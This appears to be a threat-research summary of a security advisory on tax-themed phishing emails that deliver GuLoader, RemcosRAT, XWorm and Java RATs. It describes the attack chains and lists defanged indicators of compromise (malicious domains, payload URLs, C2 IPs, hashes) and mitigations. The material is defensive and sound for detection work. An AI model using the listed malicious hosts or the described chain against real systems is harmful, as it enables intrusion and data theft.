Threat Research

Increase in Tax-Themed Email Lure

admin

eSentire observed a surge in tax-themed phishing emails delivering loaders and Java-based RATs—notably GuLoader (leading to RemcosRAT), XWorm, RattyRat, and SorillusRAT—via links to password-protected ZIPs, malicious .jar/.js/.vbs files, and LNK artifacts that execute PowerShell and in-memory payloads. The advisory details attack chains, observed C2s/hosting URLs and hashes, and recommends technical mitigations including EDR/NGAV, blocking risky attachments/URLs, and configuration changes. #GuLoader #RemcosRAT #XWorm #RattyRat #SorillusRAT #eSentire

Keypoints

  • Attackers used tax-themed phishing emails with links to password-protected ZIP archives that impersonate tax documents.
  • ZIP archives contained LNK files or JavaScript/Java artifacts which, when executed, deployed GuLoader, XWorm, RattyRat, or SorillusRAT.
  • GuLoader execution triggered PowerShell commands, established persistence via Registry Run Keys, and injected RemcosRAT into legitimate process memory.
  • XWorm and other RATs retrieved payloads from remote C2 servers over HTTP(S); observed EDR blocked JavaScript and PowerShell in at least one incident.
  • Observed IOCs include multiple phishing domains, hosting URLs, file hashes for LNK/VBS/JAR/ZIP, and C2 IPs/domains (examples listed below).
  • Recommended defenses: up-to-date AV signatures, NGAV/EDR, block password-protected ZIPs and .jar attachments/URLs, remove Java where unnecessary, apply “Open With” mitigations for .jar and script files, and enforce MFA.

MITRE Techniques

  • [T1566.001] Spearphishing Link – Phishing emails delivered links to payloads and ZIP archives: (‘tax-themed malicious emails which contain a link to a password protected ZIP archive that impersonates a tax return’)
  • [T1204.002] User Execution: Malicious File – Users interacting with LNK, .jar, .js or .vbs led to execution: (‘The ZIP archive contains an LNK file, which if interacted with, leads to the deployment of GuLoader’)
  • [T1105] Ingress Tool Transfer – Downloading of payloads from attacker-hosted URLs to victim systems: (‘a link to a password protected ZIP archive … The ZIP archive contains an LNK file … leads to the deployment of GuLoader’)
  • [T1059.001] Command and Scripting Interpreter: PowerShell – GuLoader and observed droppers executed PowerShell commands to retrieve and launch payloads: (‘GuLoader is then launched resulting in the execution of PowerShell commands’)
  • [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys and Startup Folder – Persistence established via registry run keys: (‘establishing persistence via Registry Run Keys’)
  • [T1055] Process Injection – RemcosRAT was injected into the memory of a legitimate process after loader execution: (‘the RemcosRAT payload is injected into the memory of a legitimate process’)
  • [T1071.001] Application Layer Protocol: Web Protocols – C2 and payload retrieval performed over HTTP/HTTPS to attacker-controlled domains and IPs: (‘retrieve the XWorm payload from its Command-and-Control (C2) server’)

Indicators of Compromise

  • [Phishing Email Domains] domains used to deliver lures – intuitfrauddept[.]com, intermountaiinhealthcare[.]org, and 2 more domains
  • [Payload Hosting URLs] hosting locations for GuLoader/XWorm/Sorillus/Ratty payloads – hxxps://trivolibolit[.]com/wp-content/Hpzion[.]png, hxxps://sahiomn[.]web[.]app/Tax_documents_PDF[.]zip, and other hosting URLs
  • [C2 Domains] command-and-control domains observed – zarusouyt2994hesut01[.]duckdns[.]org, 1shanamubunz[.]com, and 2 more C2 domains
  • [IP Addresses] C2 and payload hosts – 85.209.176[.]69, 91.92.243[.]28, 185.196.220[.]62
  • [File Hashes] hashes for LNK/VBS/JAR/ZIP artifacts – AA55DC4FBEE738D2EAA714E6136C4E0CE8E3EF99…, 1C56940B0234BF7BEAC519CB62BD0DBE1E1B96B6…, and 7 more hashes

Attack chains observed follow a repeatable technical pattern: recipients receive tax-themed emails pointing to attacker-hosted links or password-protected ZIP files. Those ZIPs commonly contain LNK shortcuts or JavaScript/Java artifacts; when the LNK or script is executed by the user, it launches GuLoader or drops other RAT installers. GuLoader variants execute PowerShell to retrieve additional components, create persistence via Registry Run Keys, and perform process injection to load RemcosRAT into a legitimate process’s memory, enabling remote control and data exfiltration.

Other variants use JavaScript or .jar files to spawn PowerShell commands that fetch XWorm or Java RAT payloads from hardcoded C2 URLs/IPs; in at least one case, the client’s endpoint agent blocked subsequent JavaScript and PowerShell activity. Observed capabilities across RemcosRAT, XWorm, RattyRat, and SorillusRAT include keylogging, screenshots, audio/webcam capture, file transfer, and remote command execution.

Mitigations focused on the technical attack path include: block password-protected ZIPs and .jar attachments/URLs at the email boundary; deploy NGAV/EDR with detection for malicious PowerShell, script execution, and process injection; keep AV signatures current; restrict or remove Java where not needed; implement “Open With” policy changes so .jar and script files open with a text editor; and enforce MFA to reduce the impact of credential theft.

Read more: https://www.esentire.com/security-advisories/increase-in-tax-themed-email-lure

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint